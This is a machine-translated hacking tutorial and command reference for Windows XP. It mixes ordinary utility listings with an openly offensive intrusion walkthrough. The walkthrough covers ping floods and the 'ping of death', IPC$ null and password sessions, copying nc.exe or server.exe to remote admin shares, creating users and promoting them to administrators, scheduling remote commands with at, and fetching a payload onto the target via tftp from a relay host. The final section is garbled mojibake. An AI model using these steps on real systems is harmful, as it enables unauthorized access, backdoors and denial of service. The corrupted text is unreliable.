Windows XP cmd command Daquan
One, ping
It is a command to check whether the network is smooth or the speed of the network connection. As an administrator or hacker living on the network, the ping command is the first DOS command that must be mastered. The principle it uses is this: machines on the network have uniquely determined IP addresses, and we give the target When the IP address sends a data packet, the other party will return a data packet of the same size. Based on the returned data packet, we can determine the existence of the target host, and can initially determine the operating system of the target host. Let's take a look at some of its commonly used operations. First look at the help, type: ping /? Enter in the DOS window. The help screen shown. Here, we only need to grasp some basic useful parameters (the same below).
-t means to send packets to the target IP without interruption until we force it to stop. Imagine if you use 100M broadband access and the target IP is a 56K kitten, then it will not take long before the target IP drops because it can't withstand so much data. Haha, an attack is so simple to achieve.
-l defines the size of the data packet sent, the default is 32 bytes, we can use it to define up to 65500 bytes. Combined with the -t parameter introduced above, it will have a better effect.
-n defines the number of data packets sent to the target IP, the default is 3 times. If the network speed is slow, 3 times is also a waste of time for us, because now our purpose is only to determine whether the target IP exists, then define it as one.
Explain that if the -t parameter and the -n parameter are used together, the ping command is based on the parameter that is placed behind, such as "ping IP -t -n 3". Although the -t parameter is used, it is not always pinged. But only ping 3 times. In addition, the ping command does not have to ping the IP, you can also directly ping the host domain name, so you can get the host IP.
Below we give an example to illustrate the specific usage.
Here TIme = 2 means that the time taken from sending a data packet to receiving a data packet is 2 seconds, from which you can judge the size of the network connection speed. The return value from TTL can preliminarily judge the operating system of the pinged host. The reason for saying "preliminary judgment" is because this value can be modified. Here TTL = 32 indicates that the operating system may be win98.
(Tips: If TTL = 128, it means that the target host may be Win2000; if TTL = 250, then the target host may be Unix)
As for the use of the ping command to quickly find LAN faults, you can quickly search for the fastest QQ server, and you can ping others ... These are up to everyone to play.
Second, nbtstat
This command uses NetBIOS over TCP / IP to display protocol statistics and current TCP / IP connections. Using this command you can get the NETBIOS information of the remote host, such as the user name, the workgroup to which it belongs, and the MAC address of the network card. Here we need to understand a few basic parameters.
-a Use this parameter, as long as you know the machine name of the remote host, you can get its NETBIOS information (the same below).
-A This parameter can also get the NETBIOS information of the remote host, but you need to know its IP.
-n List the NETBIOS information of the local machine.
When you get the other party's IP or machine name, you can use the nbtstat command to further get the other party's information, which increases the insurance factor of our invasion.
Three, netstat
This is a command to check the network status, easy to operate and powerful.
-a View all the open ports of the local machine, you can effectively find and prevent Trojans, you can know the services and other information opened by the machine, as shown in Figure 4.
Here we can see that the local machine is open with FTP service, Telnet service, mail service, WEB service, etc. Usage: netstat -a IP.
-r List the current routing information, tell us the local machine's gateway, subnet mask and other information. Usage: netstat -r IP.
Four, tracert
Tracking routing information, use this command to find out all the paths through which data is transmitted from the local machine to the target host, which is very helpful for us to understand the network layout and structure. As shown in Figure 5.
This shows that the data is transferred from the local machine to the 192.168.0.1 machine without any transfer between them, indicating that the two machines are in the same LAN. Usage: tracert IP.
Five, net
This command is the most important one of the network commands. You must thoroughly understand the usage of each of its subcommands, because its function is too powerful. This is simply the best intrusion tool provided by Microsoft. First let's take a look at the subcommands that it has. Type net /? To enter as shown in Figure 6.
Here, we focus on several commonly used subcommands for intrusion.
net view
Use this command to view all shared resources of the remote host. The command format is net view \ IP.
net use
Map a shared resource of a remote host as a local drive letter, and the graphical interface is convenient to use. The command format is net use x: \ IP \ sharename. The previous one indicates that the shared directory named magic of 192.168.0.5IP is mapped to the local Z disk. The following means establishing an IPC $ connection with 192.168.0.7 (net use \ IP \ IPC $ "password" / user: "name"),
After the IPC $ connection is established, hehe, you can upload the file: copy nc.exe \ 192.168.0.7 \ admin $, which means that nc.exe in the local directory is transferred to the remote host, combined with other DOS commands to be introduced later You can achieve an invasion.
net start
Use it to start services on the remote host. When you establish a connection with a remote host, what if you find that its service has not been started, and you want to use this service? Just use this command to start it. Usage: net start servername, as shown in Figure 9, successfully started the telnet service.
net stop
What should I do if a service on the remote host is hindered after the invasion? Use this command to stop and it is ok, the usage is the same as net start.
net user
View information related to accounts, including creating new accounts, deleting accounts, viewing specific accounts, activating accounts, disabling accounts, etc. This is very beneficial to our invasion, and most importantly, it provides the premise for us to clone the account. Type net user without parameters to view all users, including those that have been disabled. Explained separately below.
1, net user abcd 1234 / add, create a new account named abcd, password 1234, the default is a member of the user group.
2. Net user abcd / del, delete the user whose user name is abcd.
3. Net user abcd / acTIve: no, disable the user whose user name is abcd.
4. Net user abcd / acTIve: yes, activate the user whose user name is abcd.
5, net user abcd, view the situation of the user whose user name is abcd
net localgroup
View all information related to user groups and perform related operations. Type net localgroup without parameters to list all current user groups. During the intrusion process, we generally use it to promote an account to the administrator group account, so that we can use this account to control the entire remote host. Usage: net localgroup groupname username / add.
Now we add the newly created user abcd to the administrator group. At this time, the abcd user is already a super administrator. Oh, you can use net user abcd to check his status. Compare it with Figure 10. come out. But this is too obvious, the network administrator can see the flaws at a glance, so this method can only deal with rookie network administrators, but we still have to know. The current method is to use other tools and means to clone a super administrator that the network administrator cannot see. This is something to say. Friends who are interested can refer to the article "Analyzing Long Account from Shallow to Deep" in the 30th issue of "Hacker Defense".
net TIme
This command can view the current time of the remote host. If your goal is only to enter the remote host, then this command may not be used. But the simple invasion succeeded, is it just a look? We need to penetrate further. This requires that even the current time of the remote host needs to be known, because time and other means (to be described later) can be used to achieve the regular start of a command and program, laying a foundation for our further invasion. Usage: net time \ IP.
Six, at
The purpose of this command is to schedule a specific command and program to be executed on a specific date or time (know that net time is important?). When we know the current time of the remote host, we can use this command to let it execute a program and command at a later time (such as 2 minutes later). Usage: at time command \ computer.
It means that at 6:55, let the computer named a-01 start the telnet service (here net start telnet is the command to start the telnet service).
Seven, ftp
Everyone should be familiar with this command, right? There are many ftp hosts open on the network, and a large part of them are anonymous, which means anyone can log in. Now if you scan a host with open ftp service (usually a machine with port 21 open), what if you still don't use the ftp command? The basic method of using ftp command is given below.
First type ftp at the command line, the ftp prompt appears, at this time you can type "help" to view the help (any DOS command can use this method to view its help).
As you may see, how do you use so many commands? In fact, you do n’t need that much, but a few basics are enough.
The first is the login process, which is going to use open. Enter "open host IP ftp port" directly at the ftp prompt and press Enter. The default port is 21 by default, you can not write. The next step is to enter a valid user name and password to log in. Here is an example of anonymous ftp.
The username and password are both ftp, and the password is not displayed. When prompted **** logged in, it means that the login is successful. Because it is an anonymous login, the user appears as Anonymous.
Next, we will introduce the use of specific commands.
dir is the same as the DOS command. It is used to view the files on the server. Just hit dir and press Enter to see the files on the ftp server.
cd into a folder.
get Download the file to the local machine.
put upload files to a remote server. It depends on whether the remote ftp server gives you write permission. If you can, huh, huh, not much to say about how to use it. Let's play freely.
delete Delete files on the remote ftp server. This must also ensure that you have write permissions.
bye quit the current connection.
quit Ibid.
Eight, telnet
Powerful remote login command, almost all intruders like to use it, after many trials. why? It is simple to operate, just like using your own machine, as long as you are familiar with DOS commands, after successfully connecting to the remote machine as administrator, you can use it to do everything you want. Here's how to use it. First, type telnet, and then type help to view its help information.
Then type open IP at the prompt and press Enter. At this time, a login window appears, allowing you to enter a valid user name and password. Any password entered here is not displayed.
When the user name and password are entered correctly, the telnet connection is successfully established. At this time, you have the same permissions as the user on the remote host. Using the DOS command can achieve what you want to do. Here I use the super administrator authority to log in.
So far, the introduction of network DOS commands has come to an end. The purpose of the introduction here is just to give the rookie network administrator an impression and let him know the importance of familiarity and mastering network DOS commands. In fact, the DOS commands related to the network are far more than this, here is just to throw the bricks, hoping to help the majority of rookie network management. Learning DOS is a great help for being a good network administrator, and is particularly proficient in some network DOS commands.
In addition, everyone should be clear that anyone who wants to enter the system must have a valid user name and password (the input method vulnerability is almost extinct), even if you only have a small permission for the account, you can use it to To achieve the final goal. Therefore, to eliminate blank passwords firmly and add a strong password to your account is the best way to defend against weak password intrusion.
Finally, sincerely speaking, it is the most important thing to cultivate a good sense of security.
=============================================
Start → Run → Command Highlights
winver check Windows version
wmimgmt.msc Open the Windows management architecture (wmi)
wupdmgr Windows Updater
wscript Windows script host settings
write tablet
winmsd system information
wiaacmgr scanner and camera wizard
winchat xp comes with LAN chat
mem.exe displays memory usage
msconfig.exe system configuration utility
mplayer2 simple widnows media player
mspaint drawing board
mstsc remote desktop connection
mplayer2 media player
magnify magnifier utility
mmc open console
mobsync synchronization command
dxdiag check directx information
drwtsn32 system doctor
devmgmt.msc device manager
dfrg.msc Disk Defragmenter
diskmgmt.msc Disk management utility
dcomcnfg open system component service
ddeshare Open dde sharing settings
dvdplay dvd player
net stop messenger stop messenger service
net start messenger start messenger service
notepad open notepad
nslookup network management tool wizard
ntbackup system backup and restore
Narrator screen "Narrator"
ntmsmgr.msc mobile storage manager
ntmsoprq.msc mobile storage administrator operation request
netstat -an (tc) command to check the interface
syncapp creates a briefcase
sysedit system configuration editor
sigverif file signature verification program
sndrec32 recorder
shrpubw creates a shared folder
secpol.msc local security policy
The syskey system is encrypted. Once encrypted, it cannot be unlocked to protect the double password of the Windows XP system.
services.msc local service settings
sndvol32 volume control program
sfc.exe system file checker
sfc / scannow windows file protection tsshutdn 60 seconds countdown shutdown command
Introduction to tourstart xp (roaming xp program that appears after installation is complete)
taskmgr task manager
eventvwr event viewer
eudcedit word making program
explorer open explorer
packager object wrapper
perfmon.msc computer performance monitoring program
progman program manager
regedit.exe Registry
rsop.msc group policy result set
regedt32 Registry Editor
rononce -p 15 seconds shutdown
regsvr32 / u * .dll Stop dll file running
regsvr32 / u zipfldr.dll cancel zip support
cmd.exe cmd command prompt
chkdsk.exe chkdsk disk check
certmgr.msc certificate management utility
calc start calculator
Charmap startup character map
cliconfg sql server client network utility
clipbrd clipboard viewer
conf start netmeeting
compmgmt.msc computer management
cleanmgr garbage collection
ciadv.msc indexing service program
osk open on-screen keyboard
odbcad32 odbc data source manager
oobe / msoobe / a Check if xp is activated
lusrmgr.msc local users and groups
logoff logout command
iexpress Trojan bundling tool, the system comes with
nslookup ip address detector
fsmgmt.msc shared folder manager
utilman accessibility manager
gpedit.msc Group Policy
The following are the commonly used running commands of the Windows operating system.Executing these commands can open the relevant utility programs corresponding to the system.If you can basically use it, you can check and repair the most basic faults of the system.In addition to the logout and close system commands, All other commands, you may wish to give it a try!
Run \ enter CMD \ enter the corresponding related utility program:
. Open C: \ Documents and Settingsï¼¼XXX (the user name currently logged into Windows XP)
.. Open the Documents and Settings folder under the drive letter where Windows XP is located
... Open the "My Computer" option.
accwiz.exe Accessibility Wizard
actmovie.exe directly displays the installation tool
append.exe allows the program to open the data in the specified directory
arp.exe Display and change the corresponding list of computer IP and hardware physical address
at.exe scheduled task
atmadm.exe ATM call manager statistics
attrib.exe displays and changes file and folder properties
autochk.exe detects and repairs the file system (XP is not available)
autoconv.exe automatically converts the system during startup (XP is not available)
autofmt.exe format process during startup (XP is not available)
autolfn.exe uses long file name format (XP is not available)
arp.exe displays and changes the correspondence between the computer's IP and the hardware physical address
calc.exe calculator
Bootvrfy.exe reports successful startup
cacls.exe display and edit ACL
cdplayer.exe CD player
change.exe terminal server related queries (XP is not available)
charmap.exe character map
chglogon.exe starts or disables session recording (XP is not available)
chgport.exe change port (terminal service) (XP is not available)
chgusr.exe change user (terminal service) (XP is not available)
chkdsk.exe disk detection program
chkntfs.exe NTFS disk detection program
cidaemon.exe forms Ci document service
cipher.exe displays or changes encrypted files or directories on NTFS
cisvc.exe opens the index content
ckcnv.exe Transform Cookies
cleanmgr.exe Disk Cleanup
cliconfg.exe SQL client network tool
clipbrd.exe scrapbook viewer
clipsrv.exe runs the Clipboard service
clspack.exe to create a list of system files
cluster.exe shows the cluster of the domain (XP is not available)
cmd.exe into 2000 \ XP DOS
cmdl32.exe automatic download connection management
cmmgr32.exe connection manager
cmmon32.exe connection manager monitoring
cmstp.exe connection manager configuration file installer
comclust.exe cluster
comp.exe compares the contents of two files and file sets
conf start netmeeting chat tool
control userpasswords2 XP password management.
compmgmt.msc computer management
cprofile.exe conversion display mode (XP is not available)
Start, run, enter CMD \ enter net config workstation computer name \ full computer name \ username workstation is active (ie network description) \ software version (ie software version number) \ DNS name of workstation domain workstation domain login domain \ COM open time timeout (seconds) \ COM send amount (bytes) \ COM send timeout (msec)
CMD \ Enter net config workstation to change the configurable workstation service settings.
CMD \ Enter net config server to display the server computer name \ server comment \ server version (ie software version number) that cannot be configured
The server is active (that is, the network description) \ The server is hidden (that is, / hidden setting)
Maximum number of logged-in users (that is, the maximum number of users who can use server shared resources)
The maximum number of open files per session (that is, the maximum number of user files that can be opened in one session)
Idle session time (minimum)
chkdsk.exe disk check.
The Chkdsk / r command in the Chkdsk / r 2000 command console checks and repairs system files
cleanmgr garbage collection
Clipbrd Clipboard Viewer
C: boot.ini Open the boot menu
compact.exe displays or changes the compression status of files on NTFS partitions
conime.exe IME console
control.exe control panel
convert.exe NTFS converts the file system to NTFS
convlog.exe Convert IIS log file format to NCSA format
cprofile.exe conversion display mode
cscript.exe compared to the host version
csrss.exe Client server Runtime process (XP is not available)
csvde.exe format conversion program (XP is not available)
dcpromo Active Directory installation (XP is not available)
drwtsn32 system doctor
diskmgmt.msc Disk Manager (and PowerQuest PartitionMagic 8.0)
dvdplay DVD player
devmgmt.msc device manager (check computer hardware, drivers)
dxdiag check DirectX information
dcomcnfg.exe DCOM configuration properties (console root directory)
dcpromo.exe installation wizard (XP is not available)
ddeshare.exe DDE share
debug.exe check DEBUG
dfrgfat.exe FAT partition disk defragmentation program
dfrgntfs.exe NTFS partition disk defragmentation program (XP is not available)
dfs_cmd_.exe configure DFS tree (XP is not available)
dfsinit.exe distributed file system initialization (XP is not available)
dfssvc.exe distributed file system server (XP is not available)
diantz.exe make CAB file
diskperf.exe disk performance counter
dmremote.exe part of the disk management service (XP is not available)
doskey.exe command line to create a macro
dosx.exe DOS extension
dplaysvr.exe runs help directly (XP is not available)
drwatson.exe Dr. Watson error detection
drwtsn32.exe Dr. Watson display and configuration management
dvdplay.exe DVD playback
dxdiag.exe Direct-X diagnostic tool
Text editing of edlin.exe command line
esentutl.exe MS database tool
eudcedit.exe word making program
eventvwr.exe event viewer
exe2bin.exe converts EXE files to binary
expand.exe unzip
extrac32.exe CAB tool
fsmgmt.msc shared folder
fastopen.exe fast access to hard disk files in memory
faxcover.exe fax cover editor
faxqueue.exe shows the fax queue
faxsend.exe Send Fax Wizard
faxsvc.exe starts the fax service
fc.exe compares the difference between two files
find.exe finds lines of text in a file
findstr.exe finds the line in the file
finger.exe a user and displays the statistical results
fixmapi.exe fix MAPI file
flattemp.exe allows or disables the temporary file directory (XP is not available)
fontview.exe displays the fonts in the font file
forcedos.exe Forces the file to run in DOS mode
ftp.exe FTP download
gpedit.msc Group Policy
gdi.exe graphical interface driver
grpconv.exe conversion program administrator group
hostname.exe displays the hostname of the machine
Internat input method icon
iexpress Trojan bundling tool, the system comes with
ieshwiz.exe Custom Folder Wizard
iexpress.exe iexpress installation package
iisreset.exe restart IIS service (IIS is not installed, not available)
internat.exe keyboard language indicator (XP is not available)
ipconfig.exe View IP configuration
ipsecmon.exe IP Security Monitor
ipxroute.exe IPX routing and source routing control program
irftp.exe wireless connection
ismserv.exe installs or deletes services in Service Control Manager
jdbgmgr.exe Java4 debugger
Jetconv.exe converts Jet Engine database (XP is not available)
Jetpack.exe compressed Jet database (XP is not available)
jview.exe Java command line loader
label.exe changes the volume label of the drive
lcwiz.exe License Wizard (XP is not available)
ldifde.exe LDIF directory exchange command line management (XP is not available)
licmgr.exe Terminal Services License Agreement Management (XP not available)
lights.exe shows the connection status (XP is not available)
llsmgr.exe Windows 2000 license agreement management (XP is not available)
llssrv.exe starts the license agreement server (XP is not available)
locator.exe RPC Locator remote positioning
lodctr.exe call performance count
logoff.exe logs off the current user
lpq.exe displays the status of the remote LPD print queue and print tasks sent to the Unix-based server
lpr.exe is used by Unix client printers to send print jobs to the NT printer server connected to the printing device.
lsass.exe DLL running LSA and Server
lserver.exe specifies the new DNS domain of the default Server (XP is not available)
lusrmgr.msc local account management
mmc console
mplayer2 player
macfile.exe to manage MACFILES (XP is not available)
magnify.exe magnifying glass
makecab.exe make CAB file
mem.exe displays memory status
migpwd.exe migration password
mmc.exe console
mnmsrvc.exe remote desktop sharing
mobsync.exe synchronization directory manager
mountvol.exe creates, deletes, or lists mount points for volumes.
mplay32.exe Media Player
mpnotify.exe notification application
mqbkup.exe information queue backup and recovery tool
mqmig.exe MSMQ Migration Utility message queue migration tool
mrinfo.exe uses SNMP multicast routing
mscdexnt.exe install MSCD
msdtc.exe dynamic transaction processing console
msg.exe sends messages to local or remote clients
mshta.exe HTML application host
msiexec.exe starts the Windows installer
mspaint.exe opens the drawing board
mstask.exe task scheduler
mstinit.exe Task Schedule Installation
Msconfig.exe system configuration utility (configuration startup options, service items)
mem.exe displays memory usage
mspaint drawing board
Net Stop Messenger
Net Start Messenger resumes messenger service
nslookup network management tool
Nslookup IP address detector
ntbackup system backup and restore
nbtstat.exe uses NBT (NetBIOS over TCP / IP) to display protocol statistics and current TCP / IP connections.
nddeapir.exe NDDE API server
netsh.exe is used to configure and monitor the Windows 2000 command line script interface (XP is not available)
netstat.exe displays protocol statistics and current TCP / IP network connections.
nlsfunc.exe loads country-specific information. Windows 2000 and the MS-DOS subsystem do not use this command to accept the command only for compatibility with MS-DOS files.
notepad.exe Open Notepad
nslookup.exe This diagnostic tool displays information from the Domain Name System (DNS) name server.
ntbackup.exe backup and fault repair tool
ntfrs.exe NT file copy service (XP is not available)
ntvdm.exe emulates a 16-bit Windows environment
nw16.exe NetWare steering
nwscript.exe Run Netware script
odbcad32.exe 32-bit ODBC data source management (driver management)
odbcconf.exe command line configuration ODBC driver and data source
packager.exe object packager
pathping.exe contains Ping and Tracert programs
pentnt.exe checks Pentium for floating point errors
perfmon.exe System Performance Monitor
ping.exe to verify the connection to the remote computer
posix.exe for Unix compatibility
print.exe prints a text file or displays the contents of the print queue.
progman.exe program manager
psxss.exe Posix subsystem application
qappsrv.exe shows the programs available on the terminal server on the network
qprocess.exe displays process information locally or remotely (terminal service required)
query.exe query process and dialogue (XP is not available)
quser.exe displays user login information (requires terminal service)
qwinsta.exe displays terminal service information
rononce -p 15 seconds shutdown
rasAdmin remote access service.
regedit.exe Registry Editor
rasadmin.exe starts the remote access service (XP is not available)
rasautou.exe establishes a RAS connection
rasdial.exe broadband, dial-up connection
ras.exe runs RAS connection (XP is not available)
Copy files between the rcp.exe computer and the system running the remote shell port monitoring program rshd
rdpclip.exe terminal and local copy and paste files
recover.exe recovers readable information from bad or defective disks.
redir.exe runs the redirect service
regedt32.exe 32-bit registration service
regini.exe modify the registration license with a script
regwiz.exe registration wizard
replace.exe replaces files in the target directory with files of the same name in the source directory.
rexec.exe The rexec command verifies the user name on the remote computer before executing the specified command. This command can only be used after the TCP / IP protocol is installed.
risetup.exe runs the remote installation wizard service (XP is not available)
route.exe controls the network routing table
rsh.exe runs commands on remote computers running RSH services
rsnotify.exe remote storage notification echo
runas.exe allows users to run specified tools and programs with other permissions
rundll32.exe start 32-bit DLL program
rwinsta.exe resets the session subsystem hardware and software to their original values
Sndvol32 volume control program
sfc.exe or CMD \ sfc.exe carriage return system file checker
services.msc network connection service
syskey system encryption, (cannot be unlocked once encrypted, protect the double password wupdmgr WIDNOWS UPDATE of windows xp system)
SCANREG / RESTORE command to restore the most recent registry
secedit.exe automated security configuration management
services.exe controls all services
sethc.exe set high contrast
setver.exe sets the MS-DOS version number reported by the MS-DOS subsystem to the program
sfc.exe system file check
shadow.exe monitors another midrange server session
shrpubw.exe to create and share folders
sigverif.exe file signature verification
smlogsvc.exe performance logs and alerts (XP is not available)
sndrec32.exe recorder
sndvol32.exe displays sound control information
snmp.exe Simple Network Management Protocol (XP is not available)
snmptrap.exe SNMP tool (XP is not available)
srvmgr.exe server manager (XP is not available)
subst.exe associates the path with the drive letter
sysedit.exe system configuration editor
syskey.exe NT account database encryption tool
sysocmgr.exe> ​​Windows installer
systray.exe runs systray with low permissions
taskmgr task manager
tasklist / svc (CMD) to understand how many system services are provided by each SVCHOST process
tlist -S (CMD) Understand how many system services each SVCHOST process provides (
taskman.exe Task Manager (XP is not available)
taskmgr.exe task manager
tcmsetup.exe phone service customer installation
tcpsvcs.exe TCP service
termsrv.exe terminal service
tftp.exe transfers files to or from a remote computer running TFTP service
themes.exe desktop theme (XP not available)
tlntadmn.exe Administrator Telnet service management
tlntsess.exe displays the current Telnet session
tlntsvr.exe starts Telnet service
The tracert.exe diagnostic utility sends Internet Control Message Protocol (ICMP) echo packets containing different time-to-live (TTL) values ​​to the target to determine the route to the target
tsadmin.exe Administrator Terminal Services Manager (XP is not available)
tscon.exe pastes user session to terminal conversation
tsdiscon.exe disconnects users of Terminal Services
tskill.exe kills terminal services
tsprof.exe uses terminal services to get query results
tsshutdn.exe shuts down the system
part of unlodctr.exe performance monitor
upg351db.exe upgrade Jet database (XP is not available)
ups.exe UPS service UPS service
user.exe Windows core service
userinit.exe open my document
usrmgr.exe domain user manager
utilman.exe specifies that the machine is automatically turned on when 2000 starts
vwipxspx.exe calls IPX / SPX VDM
w32tm.exe time server
wextract.exe extracts Windows files
winchat.exe opens the Windows chat tool
winhlp32.exe running help system
winmsd.exe View system information
winver.exe displays the Windows version
wizmgr.exe Windows Management Wizard (XP is not available)
wjview.exe Java command line call Java
write.exe Open WordPad
wscript.exe script tool
wupdmgr.exe Windows update Run the Windows update upgrade wizard
winver check Windows version
Win98 system tools start, run, enter Msconfig system configuration utility to configure startup options, including config.sys, autoexec.bat, win.ini, system.ini and the startup items in the registry and program menu. And can set whether to start failure.
Start, run, enter Regedit Registry modification tool Registry Editor, if you are not sure do not modify the registry at will!
Start, run, and enter the Regsvr32 dll registration tool. When prompted to find the dll file, you can use this to register the dynamic link library.
Start, run, and enter Regwiz Registration Wizard for registration. Verify system files and restore system files.
If a similar * .vxd file error occurs during startup, you can use this to restore the vxd file.
Start, run, enter Scandskw disk scanning program, used to scan repair disk. If there is an error in the disk or file, it can be used for initial repair.
Start, run, enter DxDiag DirectX diagnostic tool can be used to detect whether DirectX is running normally.
Start, run, enter NETSCAPE
ESC: clear the current command line;
F7: Display the command history, give all the commands you have entered in the form of a graphical list window, and use the up and down arrow keys to choose to execute the command again.
F8: Search the history of commands, and cycle through all the commands you have entered until you press the Enter key;
F9: Select the command by number, and ask you to enter the number corresponding to the command (starting from 0) in a graphical dialog box, and display the command on the screen;
Ctrl + H: Delete a character to the left of the cursor;
Ctrl + C Ctrl + Break, forcibly abort the command execution;
Ctrl + M: Enter confirmation key;
Alt + F7: Clear the history of all commands that have been entered;
Alt + PrintScreen: intercept the contents of the current command window on the screen.
The virus has damaged the system files, please use anti-virus software to check and kill the virus, and then use the Chkdsk / r command in the "Command Console" provided by Windows 2000 to check and repair the system files.
DOS Command Dictionary ... Favorites
net use \ ip \ ipc $ "" / user: "" Create an empty IPC link
net use \ ip \ ipc $ "password" / user: "user name" Create IPC non-empty link
net use h: \ ip \ c $ "password" / user: "user name" and map the other party directly after login: H to local:
net use h: \ ip \ c $ After login, map the other party C: to H:
net use \ ip \ ipc $ / del delete IPC link
net use h: / del deletes the mapping from the counterpart to the local H:
net user username password / add create user
net user guest / active: yes activates the guest user
net user to see which users
net user account name view account properties
net localgroup *** istrators username / add Add "user" to the administrator to make it have administrator rights, note: add s after *** istrator
net start to see which services are turned on
net start service name to start the service; (eg: net start telnet, net start schedule)
net stop service name to stop a service
net time \ target ip view the other party's time
net time \ target ip / set Set the local computer time to synchronize with the "target IP" host time, plus the parameter / yes to cancel the confirmation message
net view Check which shares are enabled in the local LAN
net view \ ip check which sharing is enabled in the other party's LAN
net config display system network settings
net logoff disconnected share
net pause service name pause a service
net send ip "text message" to send a message to the other party
net ver The type and information of the network connection being used in the LAN
net share View locally opened share
net share ipc $ open ipc
net share ipc $ / del delete ipc
net share c $ / del delete C: share
net user guest 12345 After logging in as the guest user, change the password to 12345
net password password change system login password
netstat -a to see which ports are open, commonly used netstat -an
netstat -n View the network connection of the port, commonly used netstat -an
netstat -v View ongoing work
Example of netstat -p protocol name: netstat -p tcq / ip Check the usage of a protocol (check the usage of tcp / ip protocol)
netstat -s View all protocol usage in use
nbtstat -A ip If one of the ports of the other party's 136 to 139 is open, you can view the recently logged-in user name of the other party (the user name before 03)-Note: the parameter -A should be capitalized
tracert-parameter ip (or computer name) trace route (data packet), parameter: "-w number" is used to set timeout interval
ping ip(或域å) å‘对方主机å‘é€é»˜è®¤å¤§å°ä¸º32å—节的数æ®ï¼Œå‚数:“-l[ç©ºæ ¼]æ•°æ®åŒ…大å°â€ï¼›â€œ-nå‘é€æ•°æ®æ¬¡æ•°â€ï¼›â€œ-tâ€æŒ‡ä¸€ç›´ping。
ping -t -l 65550 ip æ»äº¡ä¹‹ping(å‘é€å¤§äºŽ64K的文件并一直pingå°±æˆäº†æ»äº¡ä¹‹ping)
ipconfig (winipcfg) 用于windows NTåŠXP(windows 95 98)查看本地ip地å€ï¼Œipconfigå¯ç”¨å‚数“/allâ€æ˜¾ç¤ºå…¨éƒ¨é…置信æ¯
tlist -t ä»¥æ ‘è¡Œåˆ—è¡¨æ˜¾ç¤ºè¿›ç¨‹(ä¸ºç³»ç»Ÿçš„é™„åŠ å·¥å…·ï¼Œé»˜è®¤æ˜¯æ²¡æœ‰å®‰è£…çš„ï¼Œåœ¨å®‰è£…ç›®å½•çš„Support/tools文件夹内)
kill -F 进程ååŠ -Få‚æ•°åŽå¼ºåˆ¶ç»“æŸæŸè¿›ç¨‹(ä¸ºç³»ç»Ÿçš„é™„åŠ å·¥å…·ï¼Œé»˜è®¤æ˜¯æ²¡æœ‰å®‰è£…çš„ï¼Œåœ¨å®‰è£…ç›®å½•çš„Support/tools文件夹内)
del -F 文件ååŠ -Få‚æ•°åŽå°±å¯åˆ 除åªè¯»æ–‡ä»¶,/ARã€/AHã€/ASã€/AAåˆ†åˆ«è¡¨ç¤ºåˆ é™¤åªè¯»ã€éšè—ã€ç³»ç»Ÿã€å˜æ¡£æ–‡ä»¶ï¼Œ/ARã€/AHã€/ASã€/AAè¡¨ç¤ºåˆ é™¤é™¤åªè¯»ã€éšè—ã€ç³»ç»Ÿã€å˜æ¡£ä»¥å¤–的文件。例如“DEL/AR *.*â€è¡¨ç¤ºåˆ 除当å‰ç›®å½•ä¸‹æ‰€æœ‰åªè¯»æ–‡ä»¶ï¼Œâ€œDEL/AS *.*â€è¡¨ç¤ºåˆ 除当å‰ç›®å½•ä¸‹é™¤ç³»ç»Ÿæ–‡ä»¶ä»¥å¤–的所有文件
#2 二:
del /S /Q 目录或用:rmdir /s /Q 目录/Såˆ é™¤ç›®å½•åŠç›®å½•ä¸‹çš„所有å目录和文件。åŒæ—¶ä½¿ç”¨å‚æ•°/Q å¯å–æ¶ˆåˆ é™¤æ“ä½œæ—¶çš„ç³»ç»Ÿç¡®è®¤å°±ç›´æŽ¥åˆ é™¤ã€‚ï¼ˆäºŒä¸ªå‘½ä»¤ä½œç”¨ç›¸åŒï¼‰
move 盘符\路径\è¦ç§»åŠ¨çš„文件åå˜æ”¾ç§»åŠ¨æ–‡ä»¶çš„路径\移动åŽæ–‡ä»¶å移动文件,用å‚æ•°/yå°†å–消确认移动目录å˜åœ¨ç›¸åŒæ–‡ä»¶çš„æ示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把ä¸åŒä¹‹å¤„输出到3st.txt文件ä¸ï¼Œ"> "å’Œ"> >" 是é‡å®šå‘命令
at idå·å¼€å¯å·²æ³¨å†Œçš„æŸä¸ªè®¡åˆ’任务
at /delete åœæ¢æ‰€æœ‰è®¡åˆ’任务,用å‚æ•°/yes则ä¸éœ€è¦ç¡®è®¤å°±ç›´æŽ¥åœæ¢
at idå·/delete åœæ¢æŸä¸ªå·²æ³¨å†Œçš„计划任务
at 查看所有的计划任务
at \ip time 程åºå(或一个命令) /r 在æŸæ—¶é—´è¿è¡Œå¯¹æ–¹æŸç¨‹åºå¹¶é‡æ–°å¯åŠ¨è®¡ç®—机
finger username @host 查看最近有哪些用户登陆
telnet ip 端å£è¿œå’Œç™»é™†æœåŠ¡å™¨,默认端å£ä¸º23
open ip 连接到IP(属telnet登陆åŽçš„命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件å1 路径\文件å2 /y å¤åˆ¶æ–‡ä»¶1到指定的目录为文件2,用å‚æ•°/yå°±åŒæ—¶å–æ¶ˆç¡®è®¤ä½ è¦æ”¹å†™ä¸€ä»½çŽ°å˜ç›®å½•æ–‡ä»¶
copy c:\srv.exe \ip\***$ å¤åˆ¶æœ¬åœ°c:\srv.exe到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg å°†2st.txt的内容è—身到1st.jpgä¸ç”Ÿæˆ3st.jpg新的文件,注:2st.txt文件头è¦ç©ºä¸‰æŽ’,å‚数:/b指二进制文件,/a指ASCLLæ ¼å¼æ–‡ä»¶
copy \ip\***$\s .exe c:\ 或:copy\ip\***$\*.* å¤åˆ¶å¯¹æ–¹***i.exe文件(所有文件)至本地C:
xcopy è¦å¤åˆ¶çš„æ–‡ä»¶æˆ–ç›®å½•æ ‘ç›®æ ‡åœ°å€\目录åå¤åˆ¶æ–‡ä»¶å’Œç›®å½•æ ‘,用å‚æ•°/Yå°†ä¸æ示覆盖相åŒæ–‡ä»¶
tftp -i 自己IP(用肉机作跳æ¿æ—¶è¿™ç”¨è‚‰æœºIP) get server.exe c:\server.exe 登陆åŽï¼Œå°†â€œIPâ€çš„server.exeä¸‹è½½åˆ°ç›®æ ‡ä¸»æœºc:\server.exe å‚数:-i指以二进制模å¼ä¼ é€ï¼Œå¦‚ä¼ é€exe文件时用,如ä¸åŠ -i 则以ASCII模å¼ï¼ˆä¼ é€æ–‡æœ¬æ–‡ä»¶æ¨¡å¼ï¼‰è¿›è¡Œä¼ é€
tftp -i 对方IP put c:\server.exe 登陆åŽï¼Œä¸Šä¼ 本地c:\server.exe至主机
